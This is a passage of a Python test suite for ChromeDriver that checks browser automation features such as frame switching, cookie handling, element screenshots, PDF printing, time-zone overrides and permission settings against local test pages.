'/chromedriver/absolute_position_element.html')) target = self._driver.FindElement('css selector', '#target') rect = target.GetRect() self.assertEquals(18, rect['x']) 
self.assertEquals(10, rect['y']) self.assertEquals(200, rect['height']) self.assertEquals(210, rect['width']) def testTouchFlickElement(self): dx = 3 dy = 4 speed = 5 flickTouchEventsPerSecond = 30 moveEvents = int( math.sqrt(dx * dx + dy * dy) * flickTouchEventsPerSecond / speed) self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) div = self._driver.ExecuteScript( 'document.body.innerHTML = "<div>old</div>";' 'var div = document.getElementsByTagName("div")[0];' 'div.addEventListener("touchstart", function() {' ' div.innerHTML = "preMove0";' '});' 'div.addEventListener("touchmove", function() {' ' res = div.innerHTML.match(/preMove(\d+)/);' ' if (res != null) {' ' div.innerHTML = "preMove" + (parseInt(res[1], 10) + 1);' ' }' '});' 'div.addEventListener("touchend", function() {' ' if (div.innerHTML == "preMove' + str(moveEvents) + '") {' ' div.innerHTML = "new<br>";' ' }' '});' 'return div;') self._driver.TouchFlick(div, dx, dy, speed) self.assertEquals(1, len(self._driver.FindElements('tag name', 'br'))) def testSwitchesToTopFrameAfterNavigation(self): self._driver.Load('about:blank') self._driver.Load(self.GetHttpUrlForFile('/chromedriver/outer.html')) frame = self._driver.FindElement('tag name', 'iframe') self._driver.SwitchToFrame(frame) self._driver.Load(self.GetHttpUrlForFile('/chromedriver/outer.html')) p = self._driver.FindElement('tag name', 'p') self.assertEquals('Two', p.GetText()) def testSwitchesToTopFrameAfterRefresh(self): self._driver.Load('about:blank') self._driver.Load(self.GetHttpUrlForFile('/chromedriver/outer.html')) frame = self._driver.FindElement('tag name', 'iframe') self._driver.SwitchToFrame(frame) self._driver.Refresh() p = self._driver.FindElement('tag name', 'p') self.assertEquals('Two', p.GetText()) def testSwitchesToTopFrameAfterGoingBack(self): self._driver.Load('about:blank') self._driver.Load(self.GetHttpUrlForFile('/chromedriver/outer.html')) frame = self._driver.FindElement('tag name', 'iframe') 
self._driver.SwitchToFrame(frame) self._driver.Load(self.GetHttpUrlForFile('/chromedriver/inner.html')) self._driver.GoBack() p = self._driver.FindElement('tag name', 'p') self.assertEquals('Two', p.GetText()) def testCanSwitchToPrintPreviewDialog(self): old_handles = self._driver.GetWindowHandles() print("Test debug: actual len of old_handles: " + str(len(old_handles)), file = sys.stdout) self.assertEquals(1, len(old_handles)) self._driver.ExecuteScript('setTimeout(function(){window.print();}, 0);') new_window_handle = self.WaitForNewWindow(self._driver, old_handles) if new_window_handle is None: print("Test debug: new_window_handle is None", file = sys.stdout) else: print("Test debug: new_window_handle is not None", file = sys.stdout) self.assertNotEqual(None, new_window_handle) self._driver.SwitchToWindow(new_window_handle) print("Test debug: actual GetCurrentUrl: " + self._driver.GetCurrentUrl(), file = sys.stdout) self.assertEquals('chrome://print/', self._driver.GetCurrentUrl()) def testCanClickInIframes(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/nested.html')) a = self._driver.FindElement('tag name', 'a') a.Click() frame_url = self._driver.ExecuteScript('return window.location.href') self.assertTrue(frame_url.endswith('#one')) frame = self._driver.FindElement('tag name', 'iframe') self._driver.SwitchToFrame(frame) a = self._driver.FindElement('tag name', 'a') a.Click() frame_url = self._driver.ExecuteScript('return window.location.href') self.assertTrue(frame_url.endswith('#two')) def testDoesntHangOnFragmentNavigation(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html#x')) def SetCookie(self, request): return {'Set-Cookie': 'x=y; HttpOnly'}, "<!DOCTYPE html><html></html>" def testGetHttpOnlyCookie(self): self._http_server.SetCallbackForPath('/setCookie', self.SetCookie) self._driver.Load(self.GetHttpUrlForFile('/setCookie')) 
self._driver.AddCookie({'name': 'a', 'value': 'b'}) cookies = self._driver.GetCookies() self.assertEquals(2, len(cookies)) for cookie in cookies: self.assertIn('name', cookie) if cookie['name'] == 'a': self.assertFalse(cookie['httpOnly']) elif cookie['name'] == 'x': self.assertTrue(cookie['httpOnly']) else: self.fail('unexpected cookie: %s' % json.dumps(cookie)) def testCookiePath(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/long_url/empty.html')) self._driver.AddCookie({'name': 'a', 'value': 'b'}) self._driver.AddCookie({ 'name': 'x', 'value': 'y', 'path': '/chromedriver/long_url'}) cookies = self._driver.GetCookies() self.assertEquals(2, len(cookies)) for cookie in cookies: self.assertIn('path', cookie) if cookie['name'] == 'a': self.assertEquals('/' , cookie['path']) if cookie['name'] == 'x': self.assertEquals('/chromedriver/long_url' , cookie['path']) def testGetNamedCookie(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/empty.html')) self._driver.AddCookie({'name': 'a', 'value': 'b'}) named_cookie = self._driver.GetNamedCookie('a') self.assertEquals('a' , named_cookie['name']) self.assertEquals('b' , named_cookie['value']) self.assertRaisesRegexp( chromedriver.NoSuchCookie, "no such cookie", self._driver.GetNamedCookie, 'foo') def testDeleteCookie(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/empty.html')) self._driver.AddCookie({'name': 'a', 'value': 'b'}) self._driver.AddCookie({'name': 'x', 'value': 'y'}) self._driver.AddCookie({'name': 'p', 'value': 'q'}) cookies = self._driver.GetCookies() self.assertEquals(3, len(cookies)) self._driver.DeleteCookie('a') self.assertEquals(2, len(self._driver.GetCookies())) self._driver.DeleteAllCookies() self.assertEquals(0, len(self._driver.GetCookies())) def testCookieForFrame(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/cross_domain_iframe.html')) self._driver.AddCookie({'name': 'outer', 'value': 'main context'}) frame = 
self._driver.FindElement('tag name', 'iframe') self._driver.SwitchToFrame(frame) self.assertTrue(self.WaitForCondition( lambda: 'outer.html' in self._driver.ExecuteScript('return window.location.href'))) self._driver.AddCookie({'name': 'inner', 'value': 'frame context'}) cookies = self._driver.GetCookies() self.assertEquals(1, len(cookies)) self.assertEquals('inner', cookies[0]['name']) self._driver.SwitchToMainFrame() cookies = self._driver.GetCookies() self.assertEquals(1, len(cookies)) self.assertEquals('outer', cookies[0]['name']) def testCanClickAlertInIframes(self): # This test requires that the page be loaded from a file:// URI, rather than # the test HTTP server. path = os.path.join(chrome_paths.GetTestData(), 'chromedriver', 'page_with_frame.html') url = 'file://' + six.moves.urllib.request.pathname2url(path) self._driver.Load(url) frame = self._driver.FindElement('css selector', '#frm') self._driver.SwitchToFrame(frame) a = self._driver.FindElement('css selector', '#btn') a.Click() self.WaitForCondition(lambda: self._driver.IsAlertOpen()) self._driver.HandleAlert(True) def testThrowErrorWithExecuteScript(self): self.assertRaisesRegexp( chromedriver.JavaScriptError, "some error", self._driver.ExecuteScript, 'throw new Error("some error")') def testDoesntCrashWhenScriptLogsUndefinedValue(self): # https://bugs.chromium.org/p/chromedriver/issues/detail?id=1547 self._driver.ExecuteScript('var b; console.log(b);') def testDoesntThrowWhenPageLogsUndefinedValue(self): # https://bugs.chromium.org/p/chromedriver/issues/detail?id=1547 self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/log_undefined_value.html')) def testCanSetCheckboxWithSpaceKey(self): self._driver.Load('about:blank') self._driver.ExecuteScript( "document.body.innerHTML = '<input type=\"checkbox\">';") checkbox = self._driver.FindElement('tag name', 'input') self.assertFalse( self._driver.ExecuteScript('return arguments[0].checked', checkbox)) checkbox.SendKeys(' ') self.assertTrue( 
self._driver.ExecuteScript('return arguments[0].checked', checkbox)) def testElementReference(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/element_ref.html')) element = self._driver.FindElement('css selector', '#link') self._driver.FindElements('tag name', 'br') w3c_id_length = 36 if (self._driver.w3c_compliant): self.assertEquals(len(element._id), w3c_id_length) def testFindElementWhenElementIsOverridden(self): self._driver.Load('about:blank') self._driver.ExecuteScript( 'document.body.appendChild(document.createElement("a"));') self._driver.ExecuteScript('window.Element = {}') self.assertEquals(1, len(self._driver.FindElements('tag name', 'a'))) def testExecuteScriptWhenObjectPrototypeIsModified(self): # Some JavaScript libraries (e.g. MooTools) do things like this. For context # see https://bugs.chromium.org/p/chromedriver/issues/detail?id=1521 self._driver.Load('about:blank') self._driver.ExecuteScript('Object.prototype.$family = undefined;') self.assertEquals(1, self._driver.ExecuteScript('return 1;')) def testWebWorkerFrames(self): """Verify web worker frames are handled correctly. Regression test for bug https://bugs.chromium.org/p/chromedriver/issues/detail?id=2340. The bug was triggered by opening a page with web worker, and then opening a page on a different site. We simulate a different site by using 'localhost' as the host name (default is '127.0.0.1'). """ self._driver.Load(self.GetHttpUrlForFile('/chromedriver/web_worker.html')) self._driver.Load(self._http_server.GetUrl('localhost') + '/chromedriver/empty.html') def testWaitForCurrentFrameToLoad(self): """Verify ChromeDriver waits for loading events of current frame Regression test for bug https://bugs.chromium.org/p/chromedriver/issues/detail?id=3164 Clicking element in frame triggers reload of that frame, click should not return until loading is complete. """ def waitAndRespond(): # test may not detect regression without small sleep. 
# locally, .2 didn't fail before code change, .3 did time.sleep(.5) self._sync_server.RespondWithContent( """ <html> <body> <p id='valueToRead'>11</p> </body> </html> """) self._http_server.SetDataForPath('/page10.html', """ <html> <head> <title> Frame </title> <script> function reloadWith(i) { window.location.assign('%s'); } </script> </head> <body> <button id='prev' onclick="reloadWith(9)">-1</button> <button id='next' onclick="reloadWith(11)">+1</button> <p id='valueToRead'>10</p> </body> </html> """ % self._sync_server.GetUrl()) self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/page_for_next_iframe.html')) frame = self._driver.FindElement('tag name', 'iframe') self._driver.SwitchToFrame(frame); thread = threading.Thread(target=waitAndRespond) thread.start() self._driver.FindElement('css selector', '#next').Click() value_display = self._driver.FindElement('css selector', '#valueToRead') self.assertEquals('11', value_display.GetText()) def testSlowIFrame(self): """Verify ChromeDriver does not wait for slow frames to load. Regression test for bugs https://bugs.chromium.org/p/chromedriver/issues/detail?id=2198 and https://bugs.chromium.org/p/chromedriver/issues/detail?id=2350. """ def waitAndRespond(): # Send iframe contents slowly time.sleep(2) self._sync_server.RespondWithContent( '<html><div id=iframediv>IFrame contents</div></html>') self._http_server.SetDataForPath('/top.html', """ <html><body> <div id='top'> <input id='button' type="button" onclick="run()" value='Click'> </div> <script> function run() { var iframe = document.createElement('iframe'); iframe.id = 'iframe'; iframe.setAttribute('src', '%s'); document.body.appendChild(iframe); } </script> </body></html>""" % self._sync_server.GetUrl()) self._driver.Load(self._http_server.GetUrl() + '/top.html') thread = threading.Thread(target=waitAndRespond) thread.start() start = monotonic() # Click should not wait for frame to load, so elapsed time from this # command should be < 2 seconds. 
self._driver.FindElement('css selector', '#button').Click() self.assertLess(monotonic() - start, 2.0) frame = self._driver.FindElement('css selector', '#iframe') # WaitForPendingNavigations examines the load state of the current frame # so ChromeDriver will wait for frame to load after SwitchToFrame # start is reused because that began the pause for the frame load self._driver.SwitchToFrame(frame) self.assertGreaterEqual(monotonic() - start, 2.0) self._driver.FindElement('css selector', '#iframediv') thread.join() @staticmethod def MakeRedImageTestScript(png_data_in_base64): """Used by the takeElementScreenshot* tests to load the PNG image via a data URI, analyze it, and PASS/FAIL depending on whether all the pixels are all rgb(255,0,0).""" return ( """ const resolve = arguments[arguments.length - 1]; const image = new Image(); image.onload = () => { var canvas = document.createElement('canvas'); canvas.width = image.width; canvas.height = image.height; var context = canvas.getContext('2d'); context.drawImage(image, 0, 0); const pixels = context.getImageData(0, 0, image.width, image.height).data; for (let i = 0; i < pixels.length; i += 4) { if (pixels[i + 0] != 255 || // Red pixels[i + 1] != 0 || // Green pixels[i + 2] != 0) { // Blue const message = ( 'FAIL: Bad pixel rgb(' + pixels.slice(i, i + 3).join(',') + ') at offset ' + i + ' from ' + image.src); // "Disabled" on Mac 10.10: 1/15 test runs produces an incorrect // pixel. Since no later Mac version, nor any other platform, // exhibits this problem, we assume this is due to a bug in this // specific version of Mac OS. So, just log the error and pass // the test. 
http://crbug.com/913603 if (navigator.userAgent.indexOf('Mac OS X 10_10') != -1) { console.error(message); console.error('Passing test due to Mac 10.10-specific bug.'); resolve('PASS'); } else { resolve(message); } return; } } resolve('PASS'); }; image.src = 'data:image/png;base64,%s'; """ % png_data_in_base64.replace("'", "\\'")) def takeScreenshotAndVerifyCorrect(self, element): """ Takes screenshot of given element and returns 'PASS' if all pixels in screenshot are rgb(255, 0, 0) and 'FAIL' otherwise """ elementScreenshotPNGBase64 = element.TakeElementScreenshot() self.assertIsNotNone(elementScreenshotPNGBase64) return self._driver.ExecuteAsyncScript( ChromeDriverTest.MakeRedImageTestScript(elementScreenshotPNGBase64)) def testTakeElementScreenshot(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/page_with_redbox.html')) # Wait for page to stabilize in case of Chrome showing top bars. # See https://crbug.com/chromedriver/2986 time.sleep(1) redElement = self._driver.FindElement('css selector', '#box') analysisResult = self.takeScreenshotAndVerifyCorrect(redElement) self.assertEquals('PASS', analysisResult) def testTakeElementScreenshotPartlyVisible(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/page_with_redbox_partly_visible.html')) self._driver.SetWindowRect(500, 500, 0, 0) # Wait for page to stabilize. See https://crbug.com/chromedriver/2986 time.sleep(1) redElement = self._driver.FindElement('css selector', '#box') analysisResult = self.takeScreenshotAndVerifyCorrect(redElement) self.assertEquals('PASS', analysisResult) def testTakeElementScreenshotInIframe(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/page_with_iframe_redbox.html')) frame = self._driver.FindElement('css selector', '#frm') self._driver.SwitchToFrame(frame) # Wait for page to stabilize in case of Chrome showing top bars. 
    # See https://crbug.com/chromedriver/2986
    time.sleep(1)
    redElement = self._driver.FindElement('css selector', '#box')
    analysisResult = self.takeScreenshotAndVerifyCorrect(redElement)
    self.assertEquals('PASS', analysisResult)

  def testTakeLargeElementScreenshot(self):
    # Element larger than the viewport must still be captured correctly.
    self._driver.Load(self.GetHttpUrlForFile(
        '/chromedriver/large_element.html'))
    self._driver.SetWindowRect(500, 500, 0, 0)
    # Wait for page to stabilize. See https://crbug.com/chromedriver/2986
    time.sleep(1)
    redElement = self._driver.FindElement('css selector', '#A')
    analysisResult = self.takeScreenshotAndVerifyCorrect(redElement)
    self.assertEquals('PASS', analysisResult)

  @staticmethod
  def png_dimensions(png_data_in_base64):
    """Return (width, height) of a base64-encoded PNG.

    Reads the IHDR chunk directly: bytes 16-24 of a PNG stream are the
    big-endian 32-bit width and height.
    """
    image = base64.b64decode(png_data_in_base64)
    width, height = struct.unpack('>LL', image[16:24])
    return int(width), int(height)

  def testTakeLargeElementViewportScreenshot(self):
    # A plain TakeScreenshot must cover exactly the viewport, in physical
    # pixels (CSS pixels * devicePixelRatio).
    self._driver.Load(self.GetHttpUrlForFile(
        '/chromedriver/large_element.html'))
    self._driver.SetWindowRect(640, 400, 0, 0)
    # Wait for page to stabilize. See https://crbug.com/chromedriver/2986
    time.sleep(1)
    viewportScreenshotPNGBase64 = self._driver.TakeScreenshot()
    self.assertIsNotNone(viewportScreenshotPNGBase64)
    mime_type = imghdr.what('', base64.b64decode(viewportScreenshotPNGBase64))
    self.assertEqual('png', mime_type)
    image_width, image_height = self.png_dimensions(viewportScreenshotPNGBase64)
    viewport_width, viewport_height = self._driver.ExecuteScript(
        '''
        const {devicePixelRatio, innerHeight, innerWidth} = window;
        return [
          Math.floor(innerWidth * devicePixelRatio),
          Math.floor(innerHeight * devicePixelRatio)
        ];
        ''')
    self.assertEquals(image_width, viewport_width)
    self.assertEquals(image_height, viewport_height)

  def testTakeLargeElementFullPageScreenshot(self):
    # TakeFullPageScreenshot must cover the whole document (including the
    # scrolled-out part) and must not disturb the window rect or scrollbars.
    self._driver.Load(self.GetHttpUrlForFile(
        '/chromedriver/large_element.html'))
    width = 640
    height = 400
    self._driver.SetWindowRect(width, height, 0, 0)
    # Wait for page to stabilize. See https://crbug.com/chromedriver/2986
    time.sleep(1)
    fullpageScreenshotPNGBase64 = self._driver.TakeFullPageScreenshot()
    self.assertIsNotNone(fullpageScreenshotPNGBase64)
    mime_type = imghdr.what('', base64.b64decode(fullpageScreenshotPNGBase64))
    self.assertEqual('png', mime_type)
    image_width, image_height = self.png_dimensions(fullpageScreenshotPNGBase64)
    # According to https://javascript.info/size-and-scroll-window,
    # width/height of the whole document, with the scrolled out part
    page_width, page_height = self._driver.ExecuteScript(
        '''
        const body = document.body;
        const doc = document.documentElement;
        const width = Math.max(body.scrollWidth, body.offsetWidth,\
                               body.clientWidth, doc.scrollWidth,\
                               doc.offsetWidth, doc.clientWidth);
        const height = Math.max(body.scrollHeight, body.offsetHeight,\
                                body.clientHeight, doc.scrollHeight,\
                                doc.offsetHeight, doc.clientHeight);
        return [
          width, height
        ];
        ''')
    self.assertEquals(image_width, page_width)
    self.assertEquals(image_height, page_height)
    # Assert Window Rect size stay the same after taking fullpage screenshot
    size = self._driver.GetWindowRect()
    self.assertEquals(size[0], width)
    self.assertEquals(size[1], height)
    # Verify scroll bars presence after test
    horizontal_scroll_bar, vertical_scroll_bar = self._driver.ExecuteScript(
        '''
        const doc = document.documentElement;
        return [
          doc.scrollWidth > doc.clientWidth,
          doc.scrollHeight > doc.clientHeight
        ];
        ''')
    self.assertEquals(horizontal_scroll_bar, True)
    self.assertEquals(vertical_scroll_bar, True)

  def testPrint(self):
    # Exercises the Print endpoint with every supported option and checks the
    # response decodes to a PDF document.
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    pdf = self._driver.PrintPDF({
        'orientation': 'landscape',
        'scale': 1.1,
        'margin': {
            'top': 1.1,
            'bottom': 2.2,
            'left': 3.3,
            'right': 4.4
        },
        'background': True,
        'shrinkToFit': False,
        'pageRanges': [1],
        'page': {
            'width': 15.6,
            'height': 20.6
        }
    })
    decoded_pdf = base64.b64decode(pdf)
    # NOTE(review): base64.b64decode returns bytes on Python 3, where
    # startswith("%PDF") (a str prefix) would raise TypeError — this check
    # only works on Python 2; confirm the suite's target interpreter.
    self.assertTrue(decoded_pdf.startswith("%PDF"))
    self.assertTrue(decoded_pdf.endswith("%%EOF"))

  def testPrintInvalidArgument(self):
    # A malformed pageRanges entry must be rejected with "invalid argument".
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    self.assertRaises(chromedriver.InvalidArgument,
                      self._driver.PrintPDF, {'pageRanges': ['x-y']})

  def testGenerateTestReport(self):
    # GenerateTestReport must surface a report to the page's ReportingObserver
    # (set up by reporting_observer.html, which stores it in window.result).
    self._driver.Load(self.GetHttpUrlForFile(
        '/chromedriver/reporting_observer.html'))
    self._driver.GenerateTestReport('test report message');
    report = self._driver.ExecuteScript('return window.result;')
    self.assertEquals('test', report['type']);
    self.assertEquals('test report message', report['body']['message']);

  def testSetTimeZone(self):
    # SetTimeZone must change both the reported IANA zone and the local time
    # JavaScript computes from a fixed UTC instant.
    defaultTimeZoneScript = '''
        return (new Intl.DateTimeFormat()).resolvedOptions().timeZone;
        ''';
    localHourScript = '''
        return (new Date("2020-10-10T00:00:00Z")).getHours();
        ''';
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    # Test to switch to Taipei
    self._driver.SetTimeZone('Asia/Taipei');
    timeZone = self._driver.ExecuteScript(defaultTimeZoneScript)
    self.assertEquals('Asia/Taipei', timeZone);
    localHour = self._driver.ExecuteScript(localHourScript)
    # Taipei time is GMT+8. Not observes DST.
    self.assertEquals(8, localHour);
    # Test to switch to Tokyo
    self._driver.SetTimeZone('Asia/Tokyo');
    timeZone = self._driver.ExecuteScript(defaultTimeZoneScript)
    self.assertEquals('Asia/Tokyo', timeZone);
    localHour = self._driver.ExecuteScript(localHourScript)
    # Tokyo time is GMT+9. Not observes DST.
self.assertEquals(9, localHour); def GetPermissionWithQuery(self, query): script = """ let query = arguments[0]; let done = arguments[1]; console.log(done); navigator.permissions.query(query) .then(function(value) { done({ status: 'success', value: value && value.state }); }, function(error) { done({ status: 'error', value: error && error.message }); }); """ return self._driver.ExecuteAsyncScript(script, query) def GetPermission(self, name): return self.GetPermissionWithQuery({ 'name': name }) def CheckPermission(self, response, expected_state): self.assertEquals(response['status'], 'success') self.assertEquals(response['value'], expected_state) def testPermissionsOpaqueOriginsThrowError(self): """ Confirms that opaque origins cannot have overrides. """ self._driver.Load("about:blank") self.assertRaises(chromedriver.InvalidArgument, self._driver.SetPermission, {'descriptor': { 'name': 'geolocation' }, 'state': 'denied'}) def testPermissionStates(self): """ Confirms that denied, granted, and prompt can be set. """ self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.SetPermission({ 'descriptor': { 'name': 'geolocation' }, 'state': 'denied' }) self.CheckPermission(self.GetPermission('geolocation'), 'denied') self._driver.SetPermission({ 'descriptor': { 'name': 'geolocation' }, 'state': 'granted' }) self.CheckPermission(self.GetPermission('geolocation'), 'granted') self._driver.SetPermission({ 'descriptor': { 'name': 'geolocation' }, 'state': 'prompt' }) self.CheckPermission(self.GetPermission('geolocation'), 'prompt') def testSettingPermissionDoesNotAffectOthers(self): """ Confirm permissions do not affect unset permissions. 
""" self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) response = self.GetPermission('geolocation') self.assertEquals(response['status'], 'success') status = response['value'] self._driver.SetPermission({ 'descriptor': { 'name': 'background-sync' }, 'state': 'denied' }) self.CheckPermission(self.GetPermission('background-sync'), 'denied') self.CheckPermission(self.GetPermission('geolocation'), status) def testMultiplePermissions(self): """ Confirms multiple custom permissions can be set simultaneously. """ self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.SetPermission({ 'descriptor': { 'name': 'geolocation' }, 'state': 'denied' }) self._driver.SetPermission({ 'descriptor': { 'name': 'background-fetch' }, 'state': 'prompt' }) self._driver.SetPermission({ 'descriptor': { 'name': 'background-sync' }, 'state': 'granted' }) self.CheckPermission(self.GetPermission('geolocation'), 'denied') self.CheckPermission(self.GetPermission('background-fetch'), 'prompt') self.CheckPermission(self.GetPermission('background-sync'), 'granted') def testSensorPermissions(self): """ Tests sensor permissions. Currently, Chrome controls all sensor permissions (accelerometer, magnetometer, gyroscope, ambient-light-sensor) with the 'sensors' permission. This test demonstrates this internal implementation detail so developers are aware of this behavior. """ self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) parameters = { 'descriptor': { 'name': 'magnetometer' }, 'state': 'granted' } self._driver.SetPermission(parameters) # Light sensor is not enabled by default, so it cannot be queried or set. 
#self.CheckPermission(self.GetPermission('ambient-light-sensor'), 'granted') self.CheckPermission(self.GetPermission('magnetometer'), 'granted') self.CheckPermission(self.GetPermission('accelerometer'), 'granted') self.CheckPermission(self.GetPermission('gyroscope'), 'granted') parameters = { 'descriptor': { 'name': 'gyroscope' }, 'state': 'denied' } self._driver.SetPermission(parameters) #self.CheckPermission(self.GetPermission('ambient-light-sensor'), 'denied') self.CheckPermission(self.GetPermission('magnetometer'), 'denied') self.CheckPermission(self.GetPermission('accelerometer'), 'denied') self.CheckPermission(self.GetPermission('gyroscope'), 'denied') def testMidiPermissions(self): """ Tests midi permission requirements. MIDI, sysex: true, when granted, should automatically grant regular MIDI permissions. When regular MIDI is denied, this should also imply MIDI with sysex is denied. """ self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) parameters = { 'descriptor': { 'name': 'midi', 'sysex': True }, 'state': 'granted' } self._driver.SetPermission(parameters) self.CheckPermission(self.GetPermissionWithQuery(parameters['descriptor']), 'granted') parameters['descriptor']['sysex'] = False self.CheckPermission(self.GetPermissionWithQuery(parameters['descriptor']), 'granted') parameters = { 'descriptor': { 'name': 'midi', 'sysex': False }, 'state': 'denied' } self._driver.SetPermission(parameters) self.CheckPermission(self.GetPermissionWithQuery(parameters['descriptor']), 'denied') # While this should be denied, Chrome does not do this. # parameters['descriptor']['sysex'] = True should be denied. def testClipboardPermissions(self): """ Tests clipboard permission requirements. clipboard-read with allowWithoutSanitization: true or false, and clipboard-write with allowWithoutSanitization: true are bundled together into one CLIPBOARD_READ_WRITE permission. clipboard write with allowWithoutSanitization: false is an auto-granted permission. 
""" self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) parameters = { 'descriptor': { 'name': 'clipboard-read' , 'allowWithoutSanitization': False }, 'state': 'granted' } raw_write_parameters = { 'descriptor': { 'name': 'clipboard-write', 'allowWithoutSanitization': True } } self.CheckPermission(self.GetPermissionWithQuery(parameters['descriptor']), 'prompt') self.CheckPermission(self.GetPermissionWithQuery( raw_write_parameters['descriptor']), 'prompt') self._driver.SetPermission(parameters) self.CheckPermission(self.GetPermissionWithQuery(parameters['descriptor']), 'granted') parameters['descriptor']['allowWithoutSanitization'] = True self.CheckPermission(self.GetPermissionWithQuery(parameters['descriptor']), 'granted') parameters['descriptor']['name'] = 'clipboard-write' self.CheckPermission(self.GetPermissionWithQuery(parameters['descriptor']), 'granted') parameters = { 'descriptor': { 'name': 'clipboard-write' }, 'state': 'prompt' } self._driver.SetPermission(parameters) self.CheckPermission(self.GetPermission('clipboard-read'), 'granted') self.CheckPermission(self.GetPermission('clipboard-write'), 'prompt') def testPersistentStoragePermissions(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) parameters = { 'descriptor': { 'name': 'persistent-storage' }, 'state': 'granted' } self._driver.SetPermission(parameters) self.CheckPermission(self.GetPermission('persistent-storage'), 'granted') parameters['state'] = 'denied' self._driver.SetPermission(parameters) self.CheckPermission(self.GetPermission('persistent-storage'), 'denied') def testPushAndNotificationsPermissions(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) parameters = { 'descriptor': { 'name': 'notifications' }, 'state': 'granted' } push_descriptor = { 'name': 'push', 'userVisibleOnly': True } self._driver.SetPermission(parameters) self.CheckPermission(self.GetPermission('notifications'), 'granted') 
self.CheckPermission(self.GetPermissionWithQuery(push_descriptor), 'granted') parameters['state'] = 'denied' self._driver.SetPermission(parameters) self.CheckPermission(self.GetPermission('notifications'), 'denied') self.CheckPermission(self.GetPermissionWithQuery(push_descriptor), 'denied') push_descriptor['userVisibleOnly'] = False parameters = { 'descriptor': push_descriptor, 'state': 'prompt' } self.assertRaises(chromedriver.InvalidArgument, self._driver.SetPermission, parameters) def testPermissionsSameOrigin(self): """ Assures permissions are shared between same-domain windows. """ window_handle = self._driver.NewWindow()['handle'] self._driver.SwitchToWindow(window_handle) self._driver.Load(self.GetHttpUrlForFile('/chromedriver/link_nav.html')) another_window_handle = self._driver.NewWindow()['handle'] self._driver.SwitchToWindow(another_window_handle) self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) # Set permission. parameters = { 'descriptor': { 'name': 'geolocation' }, 'state': 'granted' } # Test that they are present across the same domain. self._driver.SetPermission(parameters) self.CheckPermission(self.GetPermission('geolocation'), 'granted') self._driver.SwitchToWindow(window_handle) self.CheckPermission(self.GetPermission('geolocation'), 'granted') def testNewWindowSameDomainHasSamePermissions(self): """ Assures permissions are shared between same-domain windows, even when window is created after permissions are set. 
""" window_handle = self._driver.NewWindow()['handle'] self._driver.SwitchToWindow(window_handle) self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.SetPermission({ 'descriptor': { 'name': 'geolocation' }, 'state': 'denied' }) self.CheckPermission(self.GetPermission('geolocation'), 'denied') same_domain = self._driver.NewWindow()['handle'] self._driver.SwitchToWindow(same_domain) self._driver.Load(self.GetHttpUrlForFile('/chromedriver/link_nav.html')) self.CheckPermission(self.GetPermission('geolocation'), 'denied') def testPermissionsSameOriginDoesNotAffectOthers(self): """ Tests whether permissions set between two domains affect others. """ window_handle = self._driver.NewWindow()['handle'] self._driver.SwitchToWindow(window_handle) self._driver.Load(self.GetHttpUrlForFile('/chromedriver/link_nav.html')) another_window_handle = self._driver.NewWindow()['handle'] self._driver.SwitchToWindow(another_window_handle) self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) different_domain = self._driver.NewWindow()['handle'] self._driver.SwitchToWindow(different_domain) self._driver.Load('https://google.com') self._driver.SetPermission({ 'descriptor': {'name': 'geolocation'}, 'state': 'denied' }) # Switch for permissions. self._driver.SwitchToWindow(another_window_handle) # Set permission. parameters = { 'descriptor': { 'name': 'geolocation' }, 'state': 'prompt' } # Test that they are present across the same domain. self._driver.SetPermission(parameters) self.CheckPermission(self.GetPermission('geolocation'), 'prompt') self._driver.SwitchToWindow(window_handle) self.CheckPermission(self.GetPermission('geolocation'), 'prompt') # Assert different domain is not the same. self._driver.SwitchToWindow(different_domain) self.CheckPermission(self.GetPermission('geolocation'), 'denied') # Tests that the webauthn capabilities are true on desktop and false on # android. 
def testWebauthnVirtualAuthenticatorsCapability(self): is_desktop = _ANDROID_PACKAGE_KEY is None self.assertEqual( is_desktop, self._driver.capabilities['webauthn:virtualAuthenticators']) self.assertEqual( is_desktop, self._driver.capabilities['webauthn:extension:largeBlob']) def testCanClickInIframesInShadow(self): """Test that you can interact with a iframe within a shadow element. See https://bugs.chromium.org/p/chromedriver/issues/detail?id=3445 """ self._driver.SetTimeouts({'implicit': 2000}) self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/shadow_iframe.html')) frame = self._driver.ExecuteScript( '''return document.querySelector("#shadow") .shadowRoot.querySelector("iframe")''') self._driver.SwitchToFrame(frame) message = self._driver.FindElement('css selector', '#message') self.assertTrue('clicked' not in message.GetText()) button = self._driver.FindElement('tag name', 'button') button.Click() message = self._driver.FindElement('css selector', '#message.result') self.assertTrue('clicked' in message.GetText()) def testCanClickInIframesInShadowScrolled(self): """Test that you can interact with a scrolled iframe within a scrolled shadow element. 
    See https://bugs.chromium.org/p/chromedriver/issues/detail?id=3445
    """
    self._driver.SetTimeouts({'implicit': 2000})
